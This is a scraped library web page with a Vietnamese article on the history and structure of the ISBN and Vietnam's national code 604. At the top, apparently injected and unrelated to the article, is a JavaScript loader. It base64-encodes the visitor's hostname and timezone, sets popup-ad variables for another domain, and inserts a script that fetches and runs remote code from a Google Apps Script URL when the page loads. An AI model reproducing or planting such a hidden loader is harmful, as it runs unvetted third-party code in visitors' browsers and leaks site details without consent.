var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Mã số tiêu chuẩn quốc tế cho sách (ISBN) tại Việt Nam | Thư viện Tạ Quang Bửu

Mã số tiêu chuẩn quốc tế cho sách (ISBN) tại Việt NamTin đưa ngày: 23/07/2010ISBN là chữ viết tắt của International Standard Book Number (Mã số tiêu chuẩn quốc tế cho sách), là mã số tiêu chuẩn quốc tế để xác định một quyển sách.

Năm 1966 ở Anh, các nhà phân phối sách và văn phòng phẩm W.H. Smith cùng bạn bè tạo một hệ thống mã cho sách, ban đầu được gọi là Standard Book Numbering (mã số tiêu chuẩn cho sách) hay SBN.Năm 1967, Công ty TNHH J. Whitaker & Son tại Anh và Công ty R.R.Bowker tại Mỹ năm 1968 giới thiệu các hệ thống mẫu về mã số sách. Năm 1968, phát triển từ những sáng kiến này, Tổ chức Quốc tế về Tiêu chuẩn hoá (ISO) thành lập một tổ chức hoạt động đánh giá tính khả thi của việc thiết lập và ứng dụng hệ thống quốc tế về mã số sách ISBN.Năm 1970, ISO phê chuẩn Mã Số Sách chuẩn Quốc tế ISBN đạt Tiêu chuẩn ISO 2108, và được sửa đổi vào những năm 1978, 1992 và 2005.Mã số ISBN lúc đó có 10 chữ số, có dạng như sau:ISBN 0-306-40615-2Các thành phần của mã số ISBN khi đó gồm :· 4chữ ISBN· Mã quốc gia/nhóm ngôn ngữ (0)· Mã nhà xuất bản (306)· Mã xuất bản phẩm (40615)· Mã kiểm tra (2).Các mã cách nhau bởi dấu gạch ngang.Trong nhiều năm, mã này được các nhà xuất bản, nhà phát hành và hệ thống thư viện trên thế giới thừa nhận và tham gia. Hầu hết các sách trên thế giới khi in ra đều có mã ISBN. Khi internet phát triển, việc mua bán sách trên mạng cũng dựa trên mã số ISBN này.Tuy nhiên, mã ISBN lúc đó có một nhược điểm lớn, đó là không thể chuyển thành mã vạch, do đó không thể đọc được bằng các máy đọc mã vạch như các mã vạch EAN-13 của GS1 trên các loại hàng hoá khác, không thích ứng với xu hướng bán kiểu siêu thị, mối thu ngân sử dụng máy đọc mã vạch để tính tiền. ISBN nghĩ ra cách khắc phục nhược điểm này bằng cách thêm vào 3 chữ số cho đủ 13 chữ số để có thể hoà đồng vào hệ thống mã số mã vạch theo chuẩn EAN-13 với 13 chữ số đang rất thông dụng cho các loại hàng hoá nói chung. Một hợp đồng giữa ISBN với GS1 được ký (xem bài của Phan Nga http://www.gs1vn.org.vn/default.aspx…334&itemid=365 ) với giá trị hợp đồng rất tượng trưng là 1USD, GS1 cho phép ISBN thêm 3 chữ số 978 hoặc 979 vào trước dãy 10 chữ số của ISBN cho đủ 13 chữ số. Khi đó, ISBN cũng có thể dễ dàng chuyển thành mã vạch để có thể đọc bằng các máy đọc mã vạch. Vậy là ISBN „đời mới” ra đời, gọi là ISBN 13, có người gọi là ISBN tích hợp mã số mã vạch, còn đời cũ gọi là ISBN 10. Tiêu chuẩn ISO 2108 cũng được sửa đổi cho phù hợp (ISO 2108: 2005).Trên cơ sở đó, năm 2007, Việt Nam cho ra đời TCVN 6380: 2007 Thông tin và tư liệu – Mã số tiêu chuẩn quốc tế cho sách (ISBN).Việt Nam cũng đã chính thức gia nhập ISBN quốc tế, và được cấp mã quốc gia là 604. Như vậy, các sách xuất bản tại Việt Nam có mã ISBN đều sẽ có các con số đầu là 978 rồi đến 604, tiếp theo là mã Nhà xuất bản, mã Xuất bản phẩm, và cuối cùng là số kiểm tra. Phương pháp tính số kiểm tra và phương pháp tạo mã vạch hoàn toàn giống như đối với mã số mã vạch EAN-13, chỉ có khác là cách thể hiện: phía trên phần mã vạch có thêm một dòng mã ISBN dạng số, trong đó có dấu gạch ngang giữa các thành phần của mã.Ở Việt Nam mã Nhà xuất bản sẽ có 1, 2 hoặc 3 con số, và tương ứng sẽ có mã Xuất bản phẩm cho mỗi nhà xuất bản là 5, 4 hoặc 3 con số (tức 100.000, 10.000 hoặc 1000 sản phẩm, kể cả mã bắt đầu bằng số 0).Hiện nay các nhà xuất bản Việt Nam đã được cấp mã Nhà xuất bản, song số sản phẩm đăng ký cấp mã ISBN chưa nhiều.

Quốc Hưng (sưu tầm)